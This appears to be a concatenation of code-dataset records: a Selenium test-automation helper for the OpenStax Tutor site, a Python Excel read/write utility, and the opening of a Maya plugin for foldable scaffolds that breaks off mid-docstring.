self.find(By.CSS_SELECTOR, '.add-period').click()\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CSS_SELECTOR, '.form-control')\n )\n ).send_keys(section_name)\n self.find(By.CSS_SELECTOR, '.-edit-period-confirm').click()\n\n def get_enrollment_code(self, section_name=None, random=False):\n \"\"\"Return the enrollment code for a class section.\"\"\"\n if 'settings' not in self.current_url():\n self.goto_course_settings()\n\n try:\n self.find(By.CSS_SELECTOR, '.direct-links-only')\n except Exception:\n print('Switch board to direct access URLs')\n direct_enrollment = self.find(By.CSS_SELECTOR, '[role=tab]')\n if direct_enrollment.get_attribute('aria-selected') != 'true':\n direct_enrollment.click()\n self.find(By.CSS_SELECTOR, '.modal-footer button').click()\n\n enrollment_urls = self.find_all(By.CSS_SELECTOR, '[readonly]')\n if section_name:\n enrollment_url = self.find(\n By.XPATH,\n '//label[contains(text(), \"%s\")]/input' % section_name\n ).get_attribute('value')\n else:\n enrollment_urls = self.find_all(By.CSS_SELECTOR, '[readonly]')\n position = randint(0, 0 if not random else len(enrollment_urls))\n enrollment_url = enrollment_urls[position] \\\n .get_attribute('value')\n\n return enrollment_url\n\n def get_book_sections(self):\n \"\"\"Return a list of book sections.\"\"\"\n self.close_beta_windows()\n sleep(1)\n self.goto_calendar()\n self.assign.open_assignment_menu(self.driver)\n self.find(By.LINK_TEXT, 'Add Reading').click()\n self.page.wait_for_page_load()\n self.wait.until(\n expect.element_to_be_clickable(\n (By.ID, 'reading-select')\n )\n ).click()\n self.page.wait_for_page_load()\n for chapter in \\\n self.find_all(By.CSS_SELECTOR, 'div.chapter-heading > a'):\n if chapter.get_attribute('aria-expanded') != 'true':\n self.scroll_to(chapter)\n sleep(0.25)\n chapter.click()\n sections = self.find_all(By.CSS_SELECTOR, '.section .chapter-section')\n section_list = []\n for section in sections:\n section_list.append(section.text)\n print('Section options: %s' % str(section_list))\n self.goto_calendar()\n return section_list\n\n def get_course_begin_end(self):\n \"\"\"Return the course start and end dates as timedate objects.\"\"\"\n if 'course' not in self.current_url():\n raise CourseSelectionError('No course selected')\n self.goto_course_settings()\n self.find(By.LINK_TEXT, 'DATES AND TIME').click()\n course_time_periods = self.find_all(\n By.CSS_SELECTOR,\n '.dates-and-times div'\n )\n if len(course_time_periods) < 3:\n raise CourseSelectionError(\n 'Course start and end dates not found',\n None\n )\n dates = course_time_periods[1].get_attribute('innerHTML')\n begin = dates.split('>')[3].split('<')[0]\n end = dates.split('>')[7].split('<')[0]\n print('Course start: \"%s\" Course end: \"%s\"' % (begin, end))\n self.goto_calendar()\n return (datetime.datetime.strptime(begin, '%m/%d/%Y'),\n datetime.datetime.strptime(end, '%m/%d/%Y'))\n\n def date_is_valid(self, date):\n \"\"\"Return boolean if end_date >= date >= start_date.\"\"\"\n print('Date validity check: {0} : {1}'.format(str(date), type(date)))\n if not isinstance(date, datetime.date):\n date = datetime.strptime(date, '%m/%d/%Y')\n date = datetime.datetime(date.year, date.month, date.day)\n start, end = self.get_course_begin_end()\n delta = timedelta(0)\n print('{0} <= {1} <= {2}'.format(str(start), str(date), str(end)))\n if date - start == delta or end - date == delta:\n return True\n return date > start and date < end\n\n def get_month_number(self, month):\n \"\"\"Take a string month and return its numberic.\"\"\"\n months = {v: k for k, v in enumerate(calendar.month_name)}\n return months[month]\n\n def get_month_year(self):\n \"\"\"Break a date string into a month year tuple.\"\"\"\n calendar_heading = self.find(\n By.CSS_SELECTOR,\n '.calendar-header-label'\n )\n Assignment.scroll_to(self.driver, calendar_heading)\n calendar_date = calendar_heading.text\n month, year = calendar_date.split(' ')\n return self.get_month_number(month), int(year)\n\n def rotate_calendar(self, target):\n \"\"\"Rotate the teacher calendar to a specific month and year.\"\"\"\n cal_month, cal_year = self.get_month_year()\n target_date = datetime.datetime.strptime(target, '%m/%d/%Y').date()\n if cal_year == target_date.year and cal_month == target_date.month:\n return\n if cal_year < target_date.year or \\\n (cal_year == target_date.year and\n cal_month < target_date.month):\n arrow = 'fa-caret-right'\n elif cal_year > target_date.year or \\\n (cal_year == target_date.year and\n cal_month > target_date.month):\n arrow = 'fa-caret-left'\n self.find(By.CLASS_NAME, arrow).click()\n sleep(0.2)\n self.rotate_calendar(target)\n\n def enable_debug_mode(self):\n \"\"\"Enable spy mode for training wheels.\"\"\"\n self.find(By.CLASS_NAME, 'debug-toggle-link').click()\n sleep(1)\n return self\n\n\nclass Student(User):\n \"\"\"User extention for students.\"\"\"\n\n CONDENSED_WIDTH = User.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n def __init__(self,\n use_env_vars=False,\n existing_driver=None,\n driver_type='chrome',\n **kwargs):\n \"\"\"Student initialization with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('STUDENT_USER')\n kwargs['password'] = os.getenv('STUDENT_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(Student, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n\n def goto_dashboard(self):\n \"\"\"Go to current work.\"\"\"\n self.goto_menu_item('Dashboard')\n\n def pay_for_student(self,\n street, city, state, zip_,\n card, exp, cvv, billing_zip):\n \"\"\"Pay for student access.\"\"\"\n if 'free trial for' in self.driver.source:\n\n self.find(By.CLASS_NAME, 'btn-primary').click()\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CSS_SELECTOR, 'div.checkout')\n )\n )\n self.find(By.CSS_SELECTOR, '[name=street_address]') \\\n .send_keys(street)\n self.find(By.CSS_SELECTOR, '[name=city]') \\\n .send_keys(city)\n select = Select(self.driver.find_element_by_name('state'))\n if len(state) == 2:\n select.select_by_value(state.upper())\n else:\n select.select_by_visible_text(state.title())\n self.find(By.CSS_SELECTOR, '[name=zip_code]') \\\n .send_keys(zip_)\n self.driver.switch_to.frame(\n self.scroll_to(\n self.find(By.ID, 'braintree-hosted-field-number')))\n self.find(By.ID, 'credit-card-number') \\\n .send_keys(card)\n self.driver.switch_to.frame(\n self.find(By.ID, 'braintree-hosted-field-expirationDate'))\n self.find(By.ID, 'expiration') \\\n .send_keys(exp)\n self.driver.switch_to.frame(\n self.find(By.ID, 'braintree-hosted-field-cvv'))\n self.find(By.ID, 'cvv') \\\n .send_keys(cvv)\n self.driver.switch_to.frame(\n self.find(By.ID, 'braintree-hosted-field-postalCode'))\n self.find(By.ID, 'postal-code') \\\n .send_keys(billing_zip)\n self.driver.switch_to.default_content()\n self.find(By.CLASS_NAME, 'purchase').click()\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CSS_SELECTOR, '.order-complete')\n )\n )\n self.scroll_to(self.find(By.CSS_SELECTOR, 'footer button')).click()\n\n def work_assignment(self):\n \"\"\"Work an assignment.\"\"\"\n if '/courses/' not in self.current_url():\n self.find(By.XPATH, '//a[contains(@class,\"na\")]')\n self.wait.until(\n expect.element_to_be_clickable(\n (By.LINK_TEXT, 'All Past Work')\n )\n )\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n def goto_past_work(self):\n \"\"\"View work for previous weeks.\"\"\"\n self.goto_dashboard()\n self.wait.until(\n expect.element_to_be_clickable(\n (By.LINK_TEXT, 'All Past Work')\n )\n ).click()\n self.page.wait_for_page_load()\n\n def goto_performance_forecast(self):\n \"\"\"View the student performance forecast.\"\"\"\n self.goto_menu_item('Performance Forecast')\n\n def practice(self, practice_set='weakest'):\n \"\"\"Complete a set of up to 5 practice problems.\"\"\"\n options = []\n self.goto_dashboard()\n # Wait for the student performance meters to load\n try:\n print('Loading Performance Forecast')\n WebDriverWait(self.driver, 60).until(\n expect.staleness_of(\n (By.CLASS_NAME, 'is-loading')\n )\n )\n except Exception:\n pass\n finally:\n self.sleep(2)\n # Select a section or the weakest topic to practice\n options.append(\n self.wait.until(\n expect.visibility_of_element_located(\n (By.CLASS_NAME, 'practice')\n )\n )\n )\n if practice_set == 'weakest':\n options[0].click()\n self.page.wait_for_page_load()\n else:\n try:\n sections = self.find_all(\n By.XPATH,\n '//button[contains(@aria-describedby,' +\n '\"progress-bar-tooltip-\")]'\n )\n for section in sections:\n options.append(section)\n except Exception:\n pass\n finally:\n options[randint(0, len(options) - 1)].click()\n self.page.wait_for_page_load()\n # How many questions are there? (default = 5)\n breadbox = self.wait.until(\n expect.presence_of_element_located(\n (By.CLASS_NAME, 'task-breadcrumbs')\n )\n )\n crumbs = breadbox.find_elements(By.TAG_NAME, 'span')\n # Answer each assessment\n for _ in repeat(None, len(crumbs) - 1):\n self.answer_assessment()\n # Finish the practice\n self.wait.until(\n expect.element_to_be_clickable(\n (By.XPATH, '//a[contains(text(),\"Dashboard\") and' +\n ' contains(@class,\"btn\")]')\n )\n ).click()\n self.page.wait_for_page_load()\n\n def answer_assessment(self):\n \"\"\"Answer a Tutor assessment.\"\"\"\n self.wait.until(\n expect.presence_of_element_located(\n (By.CLASS_NAME, 'openstax-question')\n )\n )\n text = chomsky(1, 500)\n wt = self.wait_time\n try:\n self.change_wait_time(3)\n text_block = self.find(By.XPATH, '//textarea')\n self.change_wait_time(wt)\n print('Enter free response')\n Assignment.send_keys(self.driver, text_block, text)\n self.find(By.CLASS_NAME, 'continue').click()\n except Exception:\n self.change_wait_time(wt)\n print('Skip free response')\n finally:\n self.page.wait_for_page_load()\n answers = self.find_all(By.CLASS_NAME, 'answer-letter')\n self.sleep(0.8)\n rand = randint(0, len(answers) - 1)\n answer = chr(ord('a') + rand)\n print('Selecting %s' % answer)\n self.scroll_to(answers[0])\n if answer == 'a':\n self.driver.execute_script('window.scrollBy(0, -160);')\n elif answer == 'd':\n self.driver.execute_script('window.scrollBy(0, 160);')\n answers[rand].click()\n self.sleep(1.0)\n self.wait.until(\n expect.element_to_be_clickable(\n (By.XPATH, '//button[span[text()=\"Submit\"]]')\n )\n ).click()\n self.wait.until(\n expect.element_to_be_clickable(\n (By.CLASS_NAME, 'continue')\n )\n ).click()\n self.page.wait_for_page_load()\n\n\nclass Admin(User):\n \"\"\"User extention for administrators.\"\"\"\n\n CONDENSED_WIDTH = User.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n def __init__(self, use_env_vars=False, existing_driver=None,\n driver_type='chrome', **kwargs):\n \"\"\"Administrator initialization with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('ADMIN_USER')\n kwargs['password'] = os.getenv('ADMIN_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(Admin, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n extension = '' if self.url.endswith('/') else '/'\n self.base = self.url + extension + 'admin'\n\n def goto_admin_control(self):\n \"\"\"Access the administrator controls.\"\"\"\n self.get('%s' % self.base)\n\n def goto_catalog_offerings(self):\n \"\"\"Access the catalog.\"\"\"\n self.get('%s%s' % (self.base, '/catalog_offerings'))\n\n def goto_course_list(self):\n \"\"\"Access the course list.\"\"\"\n self.get('%s%s' % (self.base, '/courses'))\n\n def goto_school_list(self):\n \"\"\"Access the school list.\"\"\"\n self.get('%s%s' % (self.base, '/school'))\n\n def goto_district_list(self):\n \"\"\"Access the district list.\"\"\"\n self.get('%s%s' % (self.base, '/districts'))\n\n def goto_tag_list(self):\n \"\"\"Access the tag list.\"\"\"\n self.get('%s%s' % (self.base, '/tags'))\n\n def goto_ecosystems(self):\n \"\"\"Access the ecosystem list.\"\"\"\n self.get('%s%s' % (self.base, '/ecosystems'))\n\n def goto_terms_and_contracts(self):\n \"\"\"Access the terms and contracts list.\"\"\"\n self.get('%s%s' % (self.url, '/fine_print'))\n\n def goto_contracts(self):\n \"\"\"Access the targeted contracts.\"\"\"\n self.get('%s%s' % (self.base, '/targeted_contracts'))\n\n def goto_course_stats(self):\n \"\"\"Access the course stats.\"\"\"\n self.get('%s%s' % (self.base, '/stats/courses'))\n\n def goto_concept_coach_stats(self):\n \"\"\"Access the Concept Coach stats.\"\"\"\n self.get('%s%s' % (self.base, '/stats/concept_coach'))\n\n def goto_user_list(self):\n \"\"\"Access the user list.\"\"\"\n self.get('%s%s' % (self.base, '/users'))\n\n def goto_jobs(self):\n \"\"\"Access the jobs list.\"\"\"\n self.get('%s%s' % (self.base, '/jobs'))\n\n def goto_research_data(self):\n \"\"\"Access the researcher data.\"\"\"\n self.get('%s%s' % (self.base, '/research_data'))\n\n def goto_salesforce_control(self):\n \"\"\"Access the Salesforce controls.\"\"\"\n self.get('%s%s' % (self.base, '/salesforce'))\n\n def goto_system_settings(self):\n \"\"\"Access the system settings.\"\"\"\n self.get('%s%s' % (self.base, '/settings'))\n\n def goto_system_notifications(self):\n \"\"\"Access the system notifications.\"\"\"\n self.get('%s%s' % (self.base, '/notifications'))\n\n\nclass ContentQA(User):\n \"\"\"User extention for content users.\"\"\"\n\n CONDENSED_WIDTH = User.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = User.DEFAULT_WAIT_TIME\n\n def __init__(self, use_env_vars=False, existing_driver=None,\n driver_type='chrome', **kwargs):\n \"\"\"Content analyst initialization with User pass-through.\"\"\"\n if use_env_vars:\n if not kwargs:\n kwargs = {}\n kwargs['username'] = os.getenv('CONTENT_USER')\n kwargs['password'] = os.getenv('CONTENT_PASSWORD')\n kwargs['site'] = os.getenv('SERVER_URL')\n kwargs['email'] = os.getenv('TEST_EMAIL_ACCOUNT')\n kwargs['email_username'] = os.getenv('TEST_EMAIL_USER')\n kwargs['email_password'] = os.getenv('TEST_EMAIL_PASSWORD')\n super(ContentQA, self).__init__(existing_driver=existing_driver,\n driver_type=driver_type,\n **kwargs)\n\n\nclass Webview(Helper):\n \"\"\"Webview navigation and control.\"\"\"\n\n CONDENSED_WIDTH = Helper.CONDENSED_WIDTH\n DEFAULT_WAIT_TIME = Helper.DEFAULT_WAIT_TIME\n\n def __init__(self,\n driver_type='chrome',\n capabilities=None,\n pasta_user=None,\n wait_time=DEFAULT_WAIT_TIME,\n remote_driver='',\n existing_driver=None,\n **kwargs):\n \"\"\"Webview constructor.\"\"\"\n self.course_dates = (None, None)\n super(Webview, self).__init__(driver_type=driver_type,\n capabilities=capabilities,\n pasta_user=pasta_user,\n wait_time=wait_time,\n existing_driver=existing_driver,\n **kwargs)\n\n def goto_section(self, section_name=None, section_number=None):\n \"\"\"Go to a specific page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n def next(self):\n \"\"\"Go to the next page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n def previous(self):\n \"\"\"Go to the previous page module.\"\"\"\n raise NotImplementedError(inspect.currentframe().f_code.co_name)\n\n\nclass CourseSelectionError(Exception):\n \"\"\"Course selection failure exception.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nclass LoginError(Exception):\n \"\"\"Login error exception.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nclass WebDriverTypeException(WebDriverException):\n \"\"\"Exception for unknown WebDriver types.\"\"\"\n\n def __init__(self, msg='', err=None):\n \"\"\"Exception initializer.\"\"\"\n self.msg = msg\n self.__traceback__ = err\n\n def __repr__(self):\n \"\"\"Return __str__ print.\"\"\"\n return self.__str__()\n\n def __str__(self):\n \"\"\"String representation of the exception.\"\"\"\n try:\n return str(self.msg).join(str(self.__traceback__))\n except Exception as e:\n return str(type(e)).join(str(e))\n\n\nif __name__ == '__main__': # pragma: no cover\n # execute if run as a script\n initialization = Helper\n","repo_name":"openstax/staxing","sub_path":"staxing/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":48450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27703892360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : Excel_utils.py\n# @Author: huifer\n# @Date : 2018-3-9\nimport xlrd\nimport xlwt\n\n\ndef read_excel(path, index=None, sheet_name=None, row=None, col=None):\n \"\"\"\n index sheet_name 选一个\n :param path: str\n :param index: int\n :param sheet_name: str\n :param row: int\n :param col: int\n :return:dict()\n \"\"\"\n workbook = xlrd.open_workbook(path)\n # 获取所有sheet\n get_sheet = workbook.sheet_names()\n if index is not None:\n # 索引获取方式\n try:\n sheet1 = workbook.sheet_by_index(index)\n except Exception as e:\n return e\n else:\n if row is not None:\n rows = sheet1.row_values(row)\n else:\n rows = []\n if col is not None:\n cols = sheet1.col_values(col)\n else:\n cols = []\n if row is not None and col is not None:\n val = sheet1.cell(row, col).value\n else:\n val = None\n return {\n 'rows': rows,\n 'cols': cols,\n 'val': val}\n elif sheet_name:\n # 名称获取方式\n try:\n sheet1 = workbook.sheet_by_name(sheet_name)\n except Exception as e:\n return e\n else:\n if row is not None:\n rows = sheet1.row_values(row)\n else:\n rows = []\n if col is not None:\n cols = sheet1.col_values(col)\n else:\n cols = []\n if row is not None and col is not None:\n val = sheet1.cell(row, col).value\n else:\n val = None\n return {\n 'rows': rows,\n 'cols': cols,\n 'val': val}\n\n \"\"\"\n # 获取所有合并单元格内容\n merge = []\n for (rlow, rhigh, clow, chigh) in sheet2.merged_cells:\n merge.append([rlow, clow])\n for index in merge:\n print(sheet2.cell_value(index[0], index[1]))\n \"\"\"\n\n\ndef excel_style(name, height, bold=False):\n \"\"\"\n\n :param name:str 字体\n :param height:int 宽\n :param bold: bool 是否夹菜\n :return: xlwt.XFStyle()\n \"\"\"\n style = xlwt.XFStyle()\n font = xlwt.Font()\n font.name = name\n font.bold = bold\n font.col = 0\n font.height = height\n style.font = font\n return style\n\n\ndef write_row_excel(path, sheet_name=None, row_context=None, row=None):\n \"\"\"\n 逐行写入\n :param path: str\n :param sheet_name: str\n :param row_context:[[],[]...]\n :param row:int\n :return: true or false\n \"\"\"\n if sheet_name is not None and row_context is not None and row is not None:\n f = xlwt.Workbook()\n sheet1 = f.add_sheet(sheet_name, cell_overwrite_ok=True)\n row = row\n for x in row_context:\n for i in range(len(x)):\n sheet1.write(row, i, x[i], excel_style(\"微软雅黑\", 220, True))\n\n row += 1\n try:\n f.save(path)\n except Exception as e:\n return e\n else:\n return True\n else:\n return \"参数错误\"\n\n\ndef write_col_excel(path, sheet_name=None, col_context=None, col=None):\n \"\"\"\n\n :param path: str\n :param sheet_name:str\n :param col_context:[[],[]...]\n :param col:int\n :return:True of false\n \"\"\"\n if sheet_name is not None and col_context is not None and col is not None:\n f = xlwt.Workbook()\n sheet1 = f.add_sheet(sheet_name, cell_overwrite_ok=True)\n col = col\n for x in col_context:\n for i in range(len(x)):\n sheet1.write(i, col, x[i], excel_style(\"微软雅黑\", 220, True))\n col += 1\n try:\n f.save(path)\n except Exception as e:\n return e\n else:\n return True\n else:\n return \"参数错误\"\n\n\nif __name__ == '__main__':\n test1 = read_excel(r\"read_test.xlsx\", index=0, row=2, col=1)\n print(test1)\n test2 = write_row_excel(\n path=\"123.xls\",\n sheet_name=\"tt1\",\n row_context=[['a', 'b', 'c'], ['aa', 'bb', 'cc'], ['aaa', 'bbb', 'ccc']],\n row=0,\n )\n print(test2)\n test3 = write_col_excel(\n path='456.xls',\n sheet_name=\"tt2\",\n col_context=[['a', 1, 2, 3], ['b', 11, 22, 33], ['c', 111, 222, 333]],\n col=0\n )\n print(test3)\n","repo_name":"huifer/Automated_Framework","sub_path":"unity/Excel_utils.py","file_name":"Excel_utils.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38836946851","text":"import os\r\nimport sys\r\nimport random\r\nimport math\r\n\r\nimport maya.OpenMaya as OpenMaya\r\nimport maya.OpenMayaAnim as OpenMayaAnim\r\nimport maya.OpenMayaMPx as OpenMayaMPx\r\nimport maya.cmds as cmds\r\nimport foldMain as fold\r\nimport numpy as np\r\nfrom typing import Dict, List, Set\r\n\r\n\r\n# Useful functions for declaring attributes as inputs or outputs.\r\ndef MAKE_INPUT(attr):\r\n attr.setKeyable(True)\r\n attr.setStorable(True)\r\n attr.setReadable(True)\r\n attr.setWritable(True)\r\n\r\n\r\ndef MAKE_OUTPUT(attr):\r\n attr.setKeyable(False)\r\n attr.setStorable(False)\r\n attr.setReadable(True)\r\n attr.setWritable(False)\r\n\r\n\r\n# Define the name of the node\r\nkPluginNodeTypeName = \"foldableNode\"\r\n\r\n# Give the node a unique ID. Make sure this ID is different from all of your\r\n# other nodes!\r\nfoldableNodeId = OpenMaya.MTypeId(0x8709)\r\n\r\n\r\n# Static helper functions\r\ndef getObjectTransformFromDag(name: str) -> OpenMaya.MFnTransform:\r\n selection_list = OpenMaya.MSelectionList()\r\n selection_list.add(name)\r\n transform_dag_path = OpenMaya.MDagPath()\r\n status = selection_list.getDagPath(0, transform_dag_path)\r\n return OpenMaya.MFnTransform(transform_dag_path)\r\n\r\n\r\ndef getObjectObjectFromDag(name: str) -> OpenMaya.MDagPath:\r\n # Create an MSelectionList object to store the plane name\r\n selection_list = OpenMaya.MSelectionList()\r\n selection_list.add(name)\r\n transform_dag_path = OpenMaya.MDagPath()\r\n status = selection_list.getDagPath(0, transform_dag_path)\r\n\r\n print(\"returning transform dag path..\")\r\n return transform_dag_path\r\n\r\n\r\ndef setUpVertBasicScene():\r\n print(\"setUpVertScene: BASIC\")\r\n pFold = getObjectTransformFromDag(\"pFoldH\")\r\n pBaseTop = getObjectTransformFromDag(\"pBaseTopH\")\r\n pBaseBottom = getObjectTransformFromDag(\"pBaseBottomH\")\r\n\r\n # Set the translation for pBottom to 0, 0, 0 and pTop to 0, 1, 0.\r\n pFold.setTranslation(OpenMaya.MVector(0, 0.5, 5), OpenMaya.MSpace.kWorld)\r\n pBaseTop.setTranslation(OpenMaya.MVector(0, 1, 5), OpenMaya.MSpace.kWorld)\r\n pBaseBottom.setTranslation(OpenMaya.MVector(0, 0, 5), OpenMaya.MSpace.kWorld)\r\n\r\n # # Set the rotation for both to 0, 0, -90. Keep in mind that EulerRotation is in radians.\r\n pFold.setRotation(OpenMaya.MEulerRotation(0, 0, math.radians(-90)))\r\n pBaseTop.setRotation(OpenMaya.MEulerRotation(0, 0, 0))\r\n pBaseBottom.setRotation(OpenMaya.MEulerRotation(0, 0, 0))\r\n\r\n\r\n# Returns a dictionary of names and positions in world space.\r\ndef getObjectVerticeNamesAndPositions(name: str) -> Dict[str, List[float]]:\r\n # TODO: There are probably better ways by getting the vertex iterator.\r\n vertex_count = cmds.polyEvaluate(name, vertex=True)\r\n vertices = {}\r\n for i in range(vertex_count):\r\n vertex_name = \"{}.vtx[{}]\".format(name, i)\r\n\r\n vertex_translation = cmds.pointPosition(vertex_name, world=True)\r\n vertices[vertex_name] = vertex_translation\r\n\r\n return vertices\r\n\r\n\r\n# Write a function that for a list of vertices, returns the closest n vertices to a given point p.\r\n# The function should return a list of triplet (vertex_name, distance, vertex_position).\r\n# The list should be sorted by distance from p.\r\ndef getClosestVertices(vertices: dict, p: OpenMaya.MVector, n: int) -> list:\r\n # Iterate through the vertices and calculate the distance from p.\r\n # Store the distance and vertex name in a list.\r\n # Sort the list by distance.\r\n # Return the first n elements of the list.\r\n distList = []\r\n for vertex_name, vertex_position in vertices.items():\r\n vertexPoint = OpenMaya.MVector(vertex_position[0], vertex_position[1], vertex_position[2])\r\n dist = OpenMaya.MVector(p - vertexPoint).length()\r\n distList.append((vertex_name, dist, vertexPoint))\r\n\r\n distList.sort(key=lambda x: x[1])\r\n return distList[:n]\r\n\r\n\r\ndef checkScaffoldConnection(pivot: OpenMaya.MVector, middlepoint: OpenMaya.MVector):\r\n dist = OpenMaya.MVector(pivot - middlepoint).length()\r\n print(\"Pivot distance to middle point: {:.6f}\".format(dist))\r\n if dist > 0.0001:\r\n print(\"Error: Distance is not 0. Patches are not connected\")\r\n exit(1)\r\n\r\n\r\n# Need to keep this function because it is a special condition that Idk how to fix yet\r\ndef checkScaffoldConnectionTopBase(parent, childPatch: str):\r\n childVertices = getObjectVerticeNamesAndPositions(childPatch)\r\n\r\n # Get child's global Y position\r\n # TODO: make this more generic in the future\r\n childY = float(childVertices[\"{}.vtx[0]\".format(childPatch)][1])\r\n\r\n # Get child's max x and min x\r\n childMaxX = max(childVertices.values(), key=lambda x: x[0])[0]\r\n childMinX = min(childVertices.values(), key=lambda x: x[0])[0]\r\n\r\n # Get child's max z and min z\r\n childMaxZ = max(childVertices.values(), key=lambda x: x[2])[2]\r\n childMinZ = min(childVertices.values(), key=lambda x: x[2])[2]\r\n\r\n # check if both of the parent's vertices are within the child's bounding box\r\n connected = True\r\n for element in parent:\r\n vertex = element[2]\r\n print(\"vertex: {:.6f}, {:.6f}, {:.6f}\".format(vertex[0], vertex[1], vertex[2]))\r\n if abs(vertex[1] - childY) > 0.0001:\r\n print(\"Y values are not the same!\")\r\n print(\"Parent Y: {}\".format(vertex[1]))\r\n print(\"Child Y: {}\".format(childY))\r\n connected = False\r\n break\r\n if vertex[0] < childMinX:\r\n print(\"X value is less than minX\")\r\n connected = False\r\n break\r\n if vertex[0] > childMaxX:\r\n print(\"X value is larger than maxX\")\r\n connected = False\r\n break\r\n if vertex[2] < childMinZ:\r\n print(\"Z value is smaller childMinZ\")\r\n connected = False\r\n break\r\n if vertex[2] > childMaxZ:\r\n print(\"Z value is larger than childMaxZ\")\r\n connected = False\r\n break\r\n\r\n if not connected:\r\n print(\"Error TOPBASE: Patches are not connected\")\r\n exit(1)\r\n\r\n\r\ndef checkScaffoldConnectionBaseNoErr(base: str, foldable) -> bool:\r\n print(\"CHECKING SCAFFOLD CONNECTION BASE...\")\r\n baseVertices = getObjectVerticeNamesAndPositions(base)\r\n\r\n # Get child's global Y position\r\n # TODO: make this more generic in the future\r\n baseY = float(baseVertices[\"{}.vtx[0]\".format(base)][1])\r\n\r\n # Get child's max x and min x\r\n baseMaxX = max(baseVertices.values(), key=lambda x: x[0])[0]\r\n baseMinX = min(baseVertices.values(), key=lambda x: x[0])[0]\r\n\r\n # Get child's max z and min z\r\n baseMaxZ = max(baseVertices.values(), key=lambda x: x[2])[2]\r\n baseMinZ = min(baseVertices.values(), key=lambda x: x[2])[2]\r\n\r\n # check if both of the parent's vertices are within the child's bounding box\r\n connected = True\r\n for element in foldable:\r\n vertex = element[2]\r\n print(\"verices in foldable closest to base: {:.6f}, {:.6f}, {:.6f}\".format(vertex[0], vertex[1], vertex[2]))\r\n if abs(vertex[1] - baseY) > 0.0001:\r\n print(\"Y values are not the same!\")\r\n print(\"Parent Y: {}\".format(vertex[1]))\r\n print(\"Child Y: {}\".format(baseY))\r\n connected = False\r\n break\r\n if vertex[0] < baseMinX:\r\n print(\"X value is less than minX\")\r\n connected = False\r\n break\r\n if vertex[0] > baseMaxX:\r\n print(\"X value is larger than maxX\")\r\n connected = False\r\n break\r\n if vertex[2] < baseMinZ:\r\n print(\"Z value is smaller childMinZ\")\r\n connected = False\r\n break\r\n if vertex[2] > baseMaxZ:\r\n print(\"Z value is larger than childMaxZ\")\r\n connected = False\r\n break\r\n\r\n return connected\r\n\r\n\r\ndef isPolyPlane(obj):\r\n # Create an MSelectionList object\r\n transformDagPath = getObjectObjectFromDag(obj)\r\n\r\n # Get the shape node\r\n print(\"Getting shape node\")\r\n transformDagPath.extendToShape()\r\n\r\n print(\"Checking if shape node is of type mesh\")\r\n # Check if the shape node is of type \"mesh\"\r\n if transformDagPath.node().hasFn(OpenMaya.MFn.kMesh):\r\n print(\"creating mesh\")\r\n # Create an MFnMesh function set\r\n fnMesh = OpenMaya.MFnMesh(transformDagPath)\r\n\r\n # Get the number of faces in the mesh\r\n numFaces = fnMesh.numPolygons()\r\n\r\n # If the mesh has only one face, it can be considered a polygonal plane\r\n if numFaces == 1:\r\n return True\r\n return False\r\n\r\n\r\nclass MayaHBasicScaffoldWrapper():\r\n\r\n def __init__(self, basePatch: str, patches: List[str], pushAxis: OpenMaya.MVector, maxHinges: int, shrinks: int):\r\n self.basePatch = basePatch\r\n self.patches = patches\r\n\r\n # TODO: hard coded for now but make it dynamic later\r\n # Get the scaleX of patches[0]\r\n self.origFoldPatchHeight = cmds.getAttr(\"{}.scaleX\".format(patches[0]))\r\n\r\n self.pushAxis = pushAxis\r\n\r\n self.maxHinges = maxHinges\r\n self.shrinks = shrinks\r\n\r\n self.newShapes = []\r\n\r\n self.inInitialPatches = []\r\n self.shapeTraverseOrder: List[str] = []\r\n self.shapeBase = []\r\n self.shapeResetTransforms = {}\r\n\r\n '''\r\n Basic scaffold peek:\r\n - basePatches: the base patch\r\n - foldablePatch: foldable patch\r\n - foldOption: list of fold solutions\r\n - foldTransform: \r\n - startAngles\r\n - endAngles\r\n - startTime\r\n - endTime\r\n - 